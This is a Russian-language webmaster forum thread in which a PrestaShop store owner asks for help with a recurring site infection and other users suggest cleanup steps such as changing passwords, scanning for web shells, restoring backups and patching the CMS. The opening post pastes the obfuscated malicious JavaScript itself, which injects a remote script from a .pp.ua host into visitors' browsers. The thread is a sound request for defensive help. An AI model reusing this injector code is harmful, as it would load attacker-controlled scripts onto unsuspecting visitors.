Вирус на сайте. Помогите разобраться.

nvshop
На сайте с 28.03.2010
Offline
62
763

Всем доброго времени суток!

Поймал на сайте вирусню. Сайт на Престе. При загрузке страницы происходит подгрузка зараженного *.js файла и отправка данных на *.pp.ua сайт (постоянно меняется имя домена но всегда на регионе pp.ua). Удаляю этот файл через фтп, все становиться нормально, но через опред время картина повторяется и этот *.js файл появляется в другой папке и уже с другим названией.

Иногда меняется код в этом файле. И дата создания файла становится прошлым годом.

Вот пример:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 n(c){p(9.e&&9.k){4 i=9.k(\'10\')[0];4 7=9.e(\'1k\');7.j(\'1h\',\'1g/1n\');7.j(\'c\',c);i.K(7)}}6 r(5){b 5.g("I")==-1}4 V="&}1i#`-#~`O";4 W="Q;E{H$t%~";4 z="%3%N$U./:,M;)L> P*";4 R="*$$T]S(d,]J^B?$A]";4 C="2.*G>x*D";6 l(5){b 5.g(a)!=-1}4 F=")2:}y*#h[:?q)1f";4 1e="/(8%1c?;";4 1d=" 8/X]1m@1l?s";4 1j="^1b{U<1a~(<;0%;";4 12="11^/<,v*[Y^w~Z@";6 m(){b u.13()}4 o="14://19.18.5/17";4 a="a";6 f(){4 5=u.15.16();p(r(5)&&l(5)&&m()){n(o)}}f();',62,86,'||||var|ua|function|script_tag||document|win|return|src||createElement|includeCounter|indexOf||head_tag|setAttribute|getElementsByTagName|isWin|cond3|includeJavascript|url|if||notChrome|||navigator|||L8e||UBaCgDSx2|Kx_|r6h|UBaCgDSx4|Cz|_kCu|xNIeDzTx0||wcx|chrome|nmjl_|appendChild|QJh|_c|pH0|df0i|Uo||UBaCgDSx3|g6|zv||UBaCgDSx0|UBaCgDSx1|ZH5c7_|Evg|W2n|head|B1t|xNIeDzTx4|javaEnabled|http|userAgent|toLowerCase|12cb391bfe0e8937aaa86deb72a68|pp|ezoxal|WlBJ4Z|Dae8NC|NwwD|xNIeDzTx2|xNIeDzTx1|7W|text|type|0h|xNIeDzTx3|script|q8E|H5|javascript'.split('|'),0,{}))

Подскажите плиз порядок действий по борьбе с вирусней.

Всем спасибо за ответы!

ИБП и АКБ для котла (http://ibpdlyakotla.com/)
Sergant87
На сайте с 19.03.2010
Offline
67
#1

Не пользоваться файловыми менеджерами, ограничить доступ по ip, сменить все пароли.

Лучший хостинг от BeGet | Тест 30 дней (http://beget.ru?id=5598). Аренда серверов | Виртуальный хостинг | Бесплатный хостинг! (http://free.beget.ru?id=5598)
K5
На сайте с 21.07.2010
Offline
209
#2

проверьте ай-болитом на предмет шеллов, затем меняйте все пароли

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
nvshop
На сайте с 28.03.2010
Offline
62
#3
kgtu5:
проверьте ай-болитом на предмет шеллов, затем меняйте все пароли

проверил вебером и авастом, нашел пару стремных php файлов на сайте, удалил (уже неделю назад) но ничего не поменялось. Пароли сменил сразу.

Так понял, что он скрипт подгружает с другого сервака, вот как узнать где это прописано...

nvshop
На сайте с 28.03.2010
Offline
62
#4
nvshop:
проверил вебером и авастом, нашел пару стремных php файлов на сайте, удалил (уже неделю назад) но ничего не поменялось. Пароли сменил сразу.
Так понял, что он скрипт подгружает с другого сервака, вот как узнать где это прописано...
ай-болитом

а...понял про что. Запустил...долго он вообще втыкает?

aeromouse
На сайте с 15.05.2006
Offline
228
#5

долго если сервер медленный и файлов много. надеюсь через ssh его запустили?

после удаления дряни с хоста, обязательно установите все заплатки на cms.

nvshop
На сайте с 28.03.2010
Offline
62
#6
aeromouse:
долго если сервер медленный и файлов много. надеюсь через ssh его запустили?
после удаления дряни с хоста, обязательно установите все заплатки на cms.

файлов больше 11гигов...минут 15 всё прошло, через экспресс проверку (.php, .html, .htaccess), нашло кучу фигни...сижу ломаю голову что с этим делать дальше... а доступа к ssh у меня нет.

Спс за совет! Только если бы я еще знал где взять заплатки на Престашоп, какие и как их ставить))

A
На сайте с 29.04.2013
Offline
22
#7

Восстановить из бэкапа чистые БД и файлы и следить за изменениями файлов.

DM
На сайте с 17.01.2009
Offline
42
#8
nvshop:

Подскажите плиз порядок действий по борьбе с вирусней.

Определить через что был взломан (заражен) сайт. Обычно это либо уязвимость в CMS сайта, либо утекшие пароли от админки, фтп и т.п. Реже это уязвимости в серверном ПО. Анализировать логи. Закрывать узявимость.

Универсальные советы:

Сменить все пароли (фтп, админка, скл и т.д.) и как уже советовали выше ограничить доступ к критичным элементам по IP.

Ограничить доступ к файлам(только чтение) для пользователя из-под которого работает сайт.

nvshop
На сайте с 28.03.2010
Offline
62
#9

Не могу найти php файл, который втыкает (и формирует) данный js скрипт в страницы сайта.

R
На сайте с 24.01.2008
Offline
180
#10

ТС все сканеры ищут максимум самое популярное, поэтому зараза может остаться на вашем хосте, необходимо проверять каждый файл вашего сайта.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий